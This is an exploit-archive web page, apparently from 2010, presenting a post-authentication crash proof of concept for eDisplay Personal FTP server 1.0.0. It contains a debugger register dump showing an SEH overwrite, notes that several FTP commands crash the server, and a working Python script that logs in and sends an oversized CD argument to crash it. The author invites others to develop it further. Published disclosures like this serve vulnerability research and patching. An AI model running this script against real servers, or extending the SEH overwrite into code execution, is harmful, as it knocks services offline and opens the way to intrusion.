SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow ExploitAlert Database

Arrow  Topic :

eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash PoC


Arrow  ExploitAlert : 7989
Arrow  Credit : loneferret
Arrow  Date : 19.03.2010

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

#THE README PART
#The STOR command will crash the server and overwrite a few interesting CPU
registers (as shown below).
#Other commands that will gives similar results are: CD / MKD / RMD They
all overwrite SEH in the same
#manner as the STOR command.
#During our research, we discovered many other DoS possibilities. These
character combinations (%s & %n)
#are pretty good at crashing this application.
#As always, if someone wishes to take this further go right ahead. Play
nice, and remember where you got it from.
#Thank you.


#SEH chain of main thread
#Address SE handler
#0012C888 41414141

#EAX 7EFEFEFE
#ECX 0012FEF8 ASCII
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\AA
AAAAAA,,,,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDX 41414141
#EBX 0139B8D0
#ESP 0012C30C
#EBP 0012C894 ASCII
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAA
AAAAAAAAAA\AAAAAAAAAAAAAAAAAA
#ESI 00000000
#EDI 0012FFFD
#EIP 50E14321 FtpSer_1.50E14321
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDF000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty %#.19L
#ST1 empty %#.19L
#ST2 empty +UNORM 19C4 00000000 7FFDF000
#ST3 empty -NAN FFFF 805970D5 F6B61A24
#ST4 empty -UNORM F000 0012FFA8 7FFDF6CC
#ST5 empty +UNORM 0010 00000000 F6B62000
#ST6 empty 0.0
#ST7 empty 45901.499999999995440
# 3 2 1 0 E S P U O Z D I
#FST 0100 Cond 0 0 0 1 Err 0 0 0 0 0 0 0 0 (LT)
#FCW 137F Prec NEAR,64 Mask 1 1 1 1 1 1

#!/usr/bin/python

import socket

buffer= "\x41" * 270

print "Fuzzing CD\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('CD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close



Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server
Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability
PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
ADT

Protect your family and valuables with Home Security Systems
Copyright © SecurityReason.com. All Rights Reserved.